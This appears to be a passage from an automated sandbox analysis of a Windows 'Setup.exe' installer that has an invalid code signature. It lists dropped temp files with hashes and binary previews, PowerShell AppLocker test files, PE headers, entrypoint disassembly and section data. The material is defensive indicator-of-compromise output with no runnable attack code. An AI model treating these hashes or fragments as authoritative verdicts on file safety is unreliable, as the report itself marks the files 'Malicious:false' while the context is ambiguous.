                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Served

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):777
                                                                                                                                                                      Entropy (8bit):3.9586418744428995
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:pyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:pyGS9PvCA433C+sCNC1
                                                                                                                                                                      MD5:906017194573324C7F663EC0C29DD8E6
                                                                                                                                                                      SHA1:05F6873387E6DAA4ED362B5C1AE4778C0DDFAC11
                                                                                                                                                                      SHA-256:A53D274AB9542F5FFC54F3C3F556A24F6908AA19012B28537BD3FBB2687BE9A5
                                                                                                                                                                      SHA-512:9FDFAC75BE2374037D7E6548EB48700583153C6A8E8B194D82C5FEF71769073B30B955BA142B21C272A9B00456FBD88D4BC455C2890B56AF8A07EC6740387D29
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Travels........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..........................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Shaved

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):87040
                                                                                                                                                                      Entropy (8bit):6.574129972694159
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:Dn+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5G:D+AqVnBypIbv18mLthfhnueoMmOqDoiu
                                                                                                                                                                      MD5:CCDB4B10228BD73A42BD9BDCACD6C3FA
                                                                                                                                                                      SHA1:F3A53ECDAAB5FC3A748030C6F3228522B425F8C7
                                                                                                                                                                      SHA-256:AC2797C2FE10F695311429692DC965D78E2DD1832871705B30F113F52ED717C0
                                                                                                                                                                      SHA-512:CD90A39214166E12B6D7C3616353BB3D796DD15F612E986BF9DBD5B635B4F6D62957F11119FD1945E0A4C73E07C0045D64371BBD8C3949D6659C135E34A8E2ED
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.]...U.....e..SV.u.W.........j...j.S.D....E.....x..v..@....9m.....E.P.E.P.E.P.......tN.E.3..e..Fj..E.E.VPS.u..........M...+...E..e..V.E.E.VPS.u..........M...*...8...H..|9...D9.t..@83.C.X..|9...D9.t..@8...@....*...&..^._^3.[....U..E...8.@.SVW.p.....~..u..E.P..^.....E.....3.]....0.....N..E......A....E.A..E..A..M.U.E...3.]..A..q..E..A..U.u.E....}..t..M..$....}..t..M........tM.E..P.......u>.u.....*..3..B.V....H..|9...D9.t..@8.P..|9...D9.t..@8.X.....+.E..M.Q.@.......P.....u......)..3.>B.V..M....._^..[....U......,SV.u.3.W..\$..~..v..F..H..Dk...D$..N..1.~..t.PSS..........6.t$............]...j....B7.......K...j....07..3..j.Z..|$........Q..C....3..D$.Y..........j.Pj.j.V..^...............N..t$.j..t$....D$0.A..D$4.A..D$8.A.j.j.V...D$H.^............D$$.D$.P.D$.P.D$.P.D$.P.D$0P.D$<P......tm.|$......t......|$..t......|$..t.....f.D$ .L$(f.G..D$$f.G..'....D$....@.D$.;D$...)....|$..t$.WS....S..B..Y.9S..B...u.Y....'...&..L$(.F.............u.....'...F......._^3.[..]...U..SV.u

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Statement

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):81920
                                                                                                                                                                      Entropy (8bit):7.998049076509527
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:yBfTExvxpZXh9ubx46Aluo2N2J8hcTqQieQoVSPUFowd9XPy0QZuX/OBpNL:yBfgBxJ9M1AAo2Nk+KieVFLcZ6mjNL
                                                                                                                                                                      MD5:281F4DB819997789982068F550A35072
                                                                                                                                                                      SHA1:FAF56A4CB2B14ADBA50CEFB49927B4E73F1FF5C2
                                                                                                                                                                      SHA-256:5B195BE894B7155D3147588D728098068D36CDBB9DF72FABD577057E699E2025
                                                                                                                                                                      SHA-512:8A5956B6E2DA603A5A0E1CFDBBDCC6D4094C92DAF0E0465162B3630DA642F22A90B0972B6B6C83A969BE66A6FA0B0201F40AA24777F1C4A6B5DD2895D91109F0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:nj.*~m^$..~hF.8v..S.._..(%....=....I......vS.x.G .........Xd....l...e.NJ4.81...{u.9.5..k......:.E2.bY.Y.&.yQB.E..|.[s>...(.e.`...q{I...3.J..R?.... ..0....0........'....t.(..7o...ye<At....-.<...n.......d..1FU.c...L..af..G..../.{."...H/:....h..'.|.#B....v....z......T.....o....E)...#Y`s..y..].].*..._.....e....ab0.+..;`c5).......rS...7U9.O.......l....O..UW.].)Rk ..2....Q..QD.3A.zx.I..y.....%......aM..M.cd.6$R.6......c..t2..(MDLT-i........nR.w...cI..c....'...=.o........".O.......C.h"..E.x.`...s4C.5)..s..M......%=iW...^.f.F..X>f.Z.U.8.yk.(bt.NW.....&...g..3..&>.LgL...M.Y5a....O.4.;.....+...I;6d..E.4.<....T...V.....r...9..&..................j..3tU..A..5.......l........i-M..:..W.u.MF.Kd.1a..../Z{+.....&.\.nj.{..6y..<.2....s/Y.Y.#.;...W...Ty.D%s:..x.>....u........G.x.^....1.H......Y..R..!}l..?c=J0,pD0.....=,..e+50.......G.....X..N.G!i.......526.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Systems

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:OpenPGP Public Key
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):12492
                                                                                                                                                                      Entropy (8bit):7.984190657327211
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:c1Lx+zglTnjPebzZfwXumF9g76gzy2X44vYvu2:ExNebNfwek9g7dzO
                                                                                                                                                                      MD5:14ABCC1FCB7EB77CB471AAA77133F0E8
                                                                                                                                                                      SHA1:457C0EDD3339EEE816C6917B33C2B1F6B962BD21
                                                                                                                                                                      SHA-256:CBB561B7501EDC6B3DBB134C951459887D7F1D02AE151FD2EEED6EF1DD0A26EA
                                                                                                                                                                      SHA-512:71FB1BA3C8B5844A7FD98720E18803F0D416877FAFA2E5AE21012890E2322C588C2EF1B7535C89CA6C065B3D41DCA2215CC22D7D4E0EB1F215E0A10EBCEDF6D7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......t...b..A.......@.a.<.wH<...Y9.<%.K...<.....h..e.]...`...u.."<,h..y7......P.yK..o....36#%..%gc*k.?.Q....Q.^.....p....iF....Gf.f0..?1.r\0?U..)~.(b.s....Z..K.4U...i.-.......FG.b.....CF.d.+...p..V.......c..'^$.,.......c...0...R.t.W_..../...z.&ng....8.". ....!. .*H.0.....K.....tTl.!._....u%...g.....O.M2....yX........yk....m...~m...W.U.. .......aX.6@...<.....J.&.b..e....c..P...|. -.#LN...3...)dR5......../r...?.O.C;F....R.#~.......h.M.2............Jv! .....f.P..Q..{Q.....)h.P.S....K.A.S...{.._.C...$.:._.m.4...=.}Vn..:.c*I.....ud|22.r.8...}......s.f..vx...,...{M.N.mJUj.g.SH.......K--........tX.;....{......./.c..s?.$.6+..b."..K..T+...n..,.8:`....,.....".96..0..p<Z5....D.Vd..*.x$....s..T..Ro...q.W.+..Di....&.^.5...f...X..x..d.....h.Y.M..L6$..p.gk..i.......~=.:.../L..]`.P_..K.@+q.u..B.".9A...#.g9..O2..0.(y+..D&`+L.]....!.......0Ab...T3..B&E..}..qE....~..SQ...F;H.._c..-.H......$i.....)..6......O.="....c...U.X..<.7G..%..]d....U..@...;..b...d

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Toys

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):130048
                                                                                                                                                                      Entropy (8bit):6.681687090731543
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:FU4CE0Imbi80PtCZEMnVIPPBxT/sZydTmRV:FhClbfSCOMVIPPL/sZx
                                                                                                                                                                      MD5:9A4BA095FCF59853D46AACC0ED9ACEDC
                                                                                                                                                                      SHA1:2F8F477F9998C719AC860B8DF65CF64F2E1AF684
                                                                                                                                                                      SHA-256:3ACADE67A3C43300472BADD003325ACD4D4CA5A32857312BBBFD21E5A16AED9A
                                                                                                                                                                      SHA-512:475E483ED5E0720D30C68A2BD268299A0346ED0E660252C97982C6AB605B7C81BE83000EF9947F5F8ADBE92B0BE660013BA7FCEE5E843565BA82277706D7DC1E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:f...................%....=....uef..L$.f..T$......f.n.f.T..=J.f.s.4f...f...f...f.v.f...%....=....t#f..L$.f....%.......t...0>J....(>J..f..L$.f....%................f..L$.f....%..................X..........]...f..T$.f.~.f.s. f.~.....................f....>J.f...P>J...Y..........f..d$.f..T$.f.~....u f.s. f.~.....?...........u....f....=J.f.W.f.T.f.v.f...%....=....uUf....f..d$.%......................t.f....%....=.?..r....f....%....=.?..s...... >J....X..........Yf.~.f.s. f.~..........f....=J.........t0f.~.....%....=....w.r....w....f..D$..D$..........f..D$..T$......T$.....T$......$.9...D$.......~(=......<...V.................W..?...&=..........V................W.......X.......X..=J.......f.Y...\..=J.f.Y...\.........f.(.@.J.f.(5.=J.f.Y.f.X.f.p....Y...X...X.f..%.>J.f.n................ ..f.W...?..f......YT$...Y.f.s.-f.p.Df.(=.=J...X.f.Y...X.f...f.Y...Y.f.Y.f.X.f.Y...Y.f.p....Y.f.p....Y...Y.f.n.f.s.-f.n.f.v.f.....X...X.f.T...X.f.W.f.v.f.....\.......X.f.T.f...._..\...X...X.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Tragedy

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):84992
                                                                                                                                                                      Entropy (8bit):6.0785099969245255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:wLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8and:wLezW9FfTut/Dde6u640ewy4Za9coRCf
                                                                                                                                                                      MD5:682B26D2846887714186B4B1D1CDC9E5
                                                                                                                                                                      SHA1:83852C4B46E5227BF3E504332FCD2DA383522E28
                                                                                                                                                                      SHA-256:59C4F79996F0F5D26FE7738394AB12FFEBA82518A05904AF12044F09DC6AF077
                                                                                                                                                                      SHA-512:893C430C1C63D5A153832DB6098460F058236FFE33143F7F3BE15D1B8424138402D177A16494353E677ED051DF1FBF7ADF980FE080589E24876CCA73C4A25CE2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:$......@..hp.L..=..Y.L$$;.uZ..t/.T$ .p.L.+.T$...8.....|$.f;.|$.u&.T$.......u....u!SSh2....7..H.I.....f;T$......@....L..L$ .......t&.F..H......j.Ph,....7..H.I........K......L..L$ ......t.j.j..M...L..L$ .{.....t.j.j......P9L..L$ .`.....t$.F..H.....N...I........u...PSj..W...L..L$ .*.....t........?.... .L..L$ .......t3.F..H..8....N..D$..I..)....L$...u...PQS............P.L..L$ .......t4.F..H.........D$0P..D$..t$.......M..D$0P.\j.......@.L..L$ ......t<.F..p...x...}...v.......L$.PV.......u........F......>.f.`.L..L$ .3.....t..F..p....}...v........;.u....Z....L$.3.B...V....p..D..8\..t..@8.P..D..8\..t..@8.X..L$@. ....L$ ......L$0....._^3.[..]...U....SV.u...WV.]..~..b..................E.j.P..2.............s..].+]....F..H........s..}.+}....F..H.......V.j).J......t..u....f....V....E..J.j).}.....t..E....F....M.WSP......V.#4.....u....;....&..F....._^3.[....U..SV.u...V......u..u.........&..F......a.~..Wr5.F..H.......t&.......8.F..p.....{..W.v...........$.......8.F..

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nzckklp.r2o.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3o1jsuc2.nge.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ab4nrurl.blx.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3b4h5yy.ivw.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lugqkuvl.qfv.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjmglce5.j0l.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):4.648387822130976
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:Setup.exe
                                                                                                                                                                      File size:73'409'696 bytes
                                                                                                                                                                      MD5:588eeb3d8f305fc008f034e10e0015c0
                                                                                                                                                                      SHA1:7a77ed807fbea72e7c94295343cf795e864adfae
                                                                                                                                                                      SHA256:d46db03077a8a6773fd70b126d8f3d61e8370ed0c1dfb26df73499cb3b65355f
                                                                                                                                                                      SHA512:695c39c2431ccb608cab670b50b74ede41284f0d1bb22330f1cd7ac72812e72be314a4ad1e75589391f813a3f5d40db4d49d3495f143c8f3ef4615f73412e760
                                                                                                                                                                      SSDEEP:24576:VEqVaQlXM7Iqu1NA+quN4PtP644/97g/z6VvwyKcqxj8FbgtRWY/gEyhJlgi:Taec0qmiPJ644/97I6VvGj8Fbg63rhB
                                                                                                                                                                      TLSH:E6F79B2E226CF7F91BBD846673933821E736AA802B10A34FF836D44D1CF68B75159B15
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:ccb2b1717133b2cc

                                                                                                                                                                      Static PE Info

                                                                                                                                                                      General

                                                                                                                                                                      Entrypoint:0x4038af
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:5
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                      Authenticode Signature

                                                                                                                                                                      Signature Valid:false
                                                                                                                                                                      Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                      Error Number:-2146869232
                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                      • 24/06/2022 09:22:08 14/04/2025 16:06:58
                                                                                                                                                                      Subject Chain
                                                                                                                                                                      • OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
                                                                                                                                                                      Version:3
                                                                                                                                                                      Thumbprint MD5:648FDCF28A095B6DA4C31C9D5CD35A64
                                                                                                                                                                      Thumbprint SHA-1:8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
                                                                                                                                                                      Thumbprint SHA-256:20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
                                                                                                                                                                      Serial:115BBE9E1C286827AF66E7A01390C206

                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                      Instruction
                                                                                                                                                                      sub esp, 000002D4h
                                                                                                                                                                      push ebx
                                                                                                                                                                      push ebp
                                                                                                                                                                      push esi
                                                                                                                                                                      push edi
                                                                                                                                                                      push 00000020h
                                                                                                                                                                      xor ebp, ebp
                                                                                                                                                                      pop esi
                                                                                                                                                                      mov dword ptr [esp+18h], ebp
                                                                                                                                                                      mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                      mov dword ptr [esp+14h], ebp
                                                                                                                                                                      call dword ptr [00409030h]
                                                                                                                                                                      push 00008001h
                                                                                                                                                                      call dword ptr [004090B4h]
                                                                                                                                                                      push ebp
                                                                                                                                                                      call dword ptr [004092C0h]
                                                                                                                                                                      push 00000008h
                                                                                                                                                                      mov dword ptr [0047EB98h], eax
                                                                                                                                                                      call 00007FC86527C00Bh
                                                                                                                                                                      push ebp
                                                                                                                                                                      push 000002B4h
                                                                                                                                                                      mov dword ptr [0047EAB0h], eax
                                                                                                                                                                      lea eax, dword ptr [esp+38h]
                                                                                                                                                                      push eax
                                                                                                                                                                      push ebp
                                                                                                                                                                      push 0040A264h
                                                                                                                                                                      call dword ptr [00409184h]
                                                                                                                                                                      push 0040A24Ch
                                                                                                                                                                      push 00476AA0h
                                                                                                                                                                      call 00007FC86527BCEDh
                                                                                                                                                                      call dword ptr [004090B0h]
                                                                                                                                                                      push eax
                                                                                                                                                                      mov edi, 004CF0A0h
                                                                                                                                                                      push edi
                                                                                                                                                                      call 00007FC86527BCDBh
                                                                                                                                                                      push ebp
                                                                                                                                                                      call dword ptr [00409134h]
                                                                                                                                                                      cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                      mov dword ptr [0047EAB8h], eax
                                                                                                                                                                      mov eax, edi
                                                                                                                                                                      jne 00007FC8652795DAh
                                                                                                                                                                      push 00000022h
                                                                                                                                                                      pop esi
                                                                                                                                                                      mov eax, 004CF0A2h
                                                                                                                                                                      push esi
                                                                                                                                                                      push eax
                                                                                                                                                                      call 00007FC86527B9B1h
                                                                                                                                                                      push eax
                                                                                                                                                                      call dword ptr [00409260h]
                                                                                                                                                                      mov esi, eax
                                                                                                                                                                      mov dword ptr [esp+1Ch], esi
                                                                                                                                                                      jmp 00007FC865279663h
                                                                                                                                                                      push 00000020h
                                                                                                                                                                      pop ebx
                                                                                                                                                                      cmp ax, bx
                                                                                                                                                                      jne 00007FC8652795DAh
                                                                                                                                                                      add esi, 02h
                                                                                                                                                                      cmp word ptr [esi], bx

                                                                                                                                                                      Rich Headers

                                                                                                                                                                      Programming Language:
                                                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                                                                                                      • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                      Data Directories

                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x59efa.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x45fffd00x24d0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                      Sections

                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .rsrc0x1000000x59efa0x5a0000ccbca815b7df0bc03a078ee84f909aaFalse0.9669406467013889data7.86959447360422IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
